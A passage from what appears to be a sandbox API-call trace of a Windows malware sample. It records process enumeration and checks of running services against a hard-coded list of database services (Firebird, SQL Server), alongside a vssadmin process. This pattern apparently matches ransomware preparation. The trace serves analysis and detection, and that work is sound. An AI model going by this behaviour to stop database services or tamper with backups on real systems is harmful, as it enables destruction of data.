th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0044.535] lstrlenW (lpString="lsm.exe") returned 7 [0044.535] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.535] lstrlenW (lpString="svchost.exe") returned 11 [0044.535] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.536] lstrlenW (lpString="svchost.exe") returned 11 [0044.536] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.537] lstrlenW (lpString="svchost.exe") returned 11 [0044.537] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.537] lstrlenW (lpString="svchost.exe") returned 11 [0044.537] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.538] lstrlenW (lpString="svchost.exe") returned 11 [0044.538] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0044.539] lstrlenW (lpString="audiodg.exe") returned 11 [0044.539] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.539] lstrlenW (lpString="svchost.exe") returned 11 [0044.539] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.540] lstrlenW (lpString="svchost.exe") returned 11 [0044.540] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0044.541] lstrlenW (lpString="dwm.exe") returned 7 [0044.541] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0044.541] lstrlenW (lpString="explorer.exe") returned 12 [0044.541] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0044.542] lstrlenW (lpString="spoolsv.exe") returned 11 [0044.542] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.543] lstrlenW (lpString="taskhost.exe") returned 12 [0044.543] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.544] lstrlenW (lpString="svchost.exe") returned 11 [0044.544] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0044.544] lstrlenW (lpString="taskeng.exe") returned 11 [0044.544] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0044.545] lstrlenW (lpString="taskhost.exe") returned 12 [0044.545] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="entrepreneur.exe")) returned 1 [0044.546] lstrlenW (lpString="entrepreneur.exe") returned 16 [0044.546] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="andrew kinds.exe")) returned 1 [0044.546] lstrlenW (lpString="andrew kinds.exe") returned 16 [0044.546] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="baskets-gazette-arm.exe")) returned 1 [0044.547] lstrlenW (lpString="baskets-gazette-arm.exe") returned 23 [0044.547] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="educated.exe")) returned 1 [0044.548] lstrlenW (lpString="educated.exe") returned 12 [0044.548] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="servers.exe")) returned 1 [0044.548] lstrlenW (lpString="servers.exe") returned 11 [0044.548] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gibson-necessary.exe")) returned 1 [0044.549] lstrlenW (lpString="gibson-necessary.exe") returned 20 [0044.549] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x328, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gbp_chair.exe")) returned 1 [0044.858] lstrlenW (lpString="gbp_chair.exe") returned 13 [0044.858] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attention infected.exe")) returned 1 [0044.858] lstrlenW (lpString="attention infected.exe") returned 22 [0044.858] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="have-oz-barrel.exe")) returned 1 [0044.859] lstrlenW (lpString="have-oz-barrel.exe") returned 18 [0044.859] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pattern amateur.exe")) returned 1 [0044.860] lstrlenW (lpString="pattern amateur.exe") returned 19 [0044.860] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x318, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="referral.exe")) returned 1 [0044.861] lstrlenW (lpString="referral.exe") returned 12 [0044.861] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="copyingseems.exe")) returned 1 [0044.861] lstrlenW (lpString="copyingseems.exe") returned 16 [0044.861] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spin generally.exe")) returned 1 [0044.862] lstrlenW (lpString="spin generally.exe") returned 18 [0044.862] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="television consolidated wav.exe")) returned 1 [0044.863] lstrlenW (lpString="television consolidated wav.exe") returned 31 [0044.863] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="transmit.exe")) returned 1 [0044.863] lstrlenW (lpString="transmit.exe") returned 12 [0044.863] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="travel-fits-insights.exe")) returned 1 [0044.864] lstrlenW (lpString="travel-fits-insights.exe") returned 24 [0044.864] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="discipline-netherlands-sail.exe")) returned 1 [0044.865] lstrlenW (lpString="discipline-netherlands-sail.exe") returned 31 [0044.865] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x408, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fed_loved_statute.exe")) returned 1 [0044.866] lstrlenW (lpString="fed_loved_statute.exe") returned 21 [0044.866] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="trial_stadium_tr.exe")) returned 1 [0044.866] lstrlenW (lpString="trial_stadium_tr.exe") returned 20 [0044.866] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="delight.exe")) returned 1 [0044.867] lstrlenW (lpString="delight.exe") returned 11 [0044.867] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="within enquiry.exe")) returned 1 [0044.868] lstrlenW (lpString="within enquiry.exe") returned 18 [0044.868] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x80c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0044.868] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0044.868] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="agent1c.exe")) returned 1 [0044.869] lstrlenW (lpString="agent1c.exe") returned 11 [0044.869] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa70, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0044.870] lstrlenW (lpString="cmd.exe") returned 7 [0044.870] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0044.870] lstrlenW (lpString="conhost.exe") returned 11 [0044.870] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xa84, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0044.871] lstrlenW (lpString="vssadmin.exe") returned 12 [0044.871] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="VSSVC.exe")) returned 1 [0044.872] lstrlenW (lpString="VSSVC.exe") returned 9 [0044.872] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0044.872] lstrlenW (lpString="svchost.exe") returned 11 [0044.872] Process32NextW (in: hSnapshot=0x190, lppe=0x21dfd34 | out: lppe=0x21dfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0044.873] CloseHandle (hObject=0x190) returned 1 [0044.873] Sleep (dwMilliseconds=0x1f4) [0046.031] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x3720448 [0046.031] EnumServicesStatusExW (in: hSCManager=0x3720448, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 0 [0046.031] GetLastError () returned 0xea [0046.031] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x12c6) returned 0x3800fb0 [0046.031] EnumServicesStatusExW (in: hSCManager=0x3720448, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3800fb0, cbBufSize=0x12c6, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3800fb0, pcbBytesNeeded=0x21dff44, lpServicesReturned=0x21dff5c, lpResumeHandle=0x0) returned 1 [0046.032] CloseServiceHandle (hSCObject=0x3720448) returned 1 [0046.032] lstrlenW (lpString="Appinfo") returned 7 [0046.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0046.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0046.032] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0046.032] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0046.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0046.032] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0046.032] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.032] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0046.032] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0046.032] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0046.032] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0046.033] lstrlenW (lpString="AudioSrv") returned 8 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0046.033] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0046.033] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0046.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0046.033] lstrlenW (lpString="BFE") returned 3 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0046.033] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0046.033] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0046.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0046.033] lstrlenW (lpString="CryptSvc") returned 8 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0046.033] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0046.033] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0046.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0046.033] lstrlenW (lpString="CscService") returned 10 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0046.033] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0046.033] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0046.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0046.033] lstrlenW (lpString="DcomLaunch") returned 10 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0046.033] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0046.033] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0046.033] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0046.033] lstrlenW (lpString="Dhcp") returned 4 [0046.033] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0046.033] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0046.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0046.034] lstrlenW (lpString="Dnscache") returned 8 [0046.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0046.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0046.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0046.034] lstrlenW (lpString="DPS") returned 3 [0046.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0046.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0046.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0046.034] lstrlenW (lpString="eventlog") returned 8 [0046.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0046.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0046.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0046.034] lstrlenW (lpString="EventSystem") returned 11 [0046.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0046.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0046.034] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0046.034] lstrlenW (lpString="gpsvc") returned 5 [0046.034] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0046.034] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0046.034] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0046.034] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0046.035] lstrlenW (lpString="iphlpsvc") returned 8 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0046.035] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0046.035] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0046.035] lstrlenW (lpString="LanmanServer") returned 12 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0046.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0046.035] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0046.035] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0046.035] lstrlenW (lpString="LanmanWorkstation") returned 17 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0046.035] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0046.035] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0046.035] lstrlenW (lpString="lmhosts") returned 7 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0046.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0046.035] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0046.035] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0046.035] lstrlenW (lpString="MMCSS") returned 5 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0046.035] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0046.035] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0046.035] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0046.035] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0046.035] lstrlenW (lpString="MpsSvc") returned 6 [0046.035] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0046.036] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0046.036] lstrcmpiW (lpString1="sqlwriter", 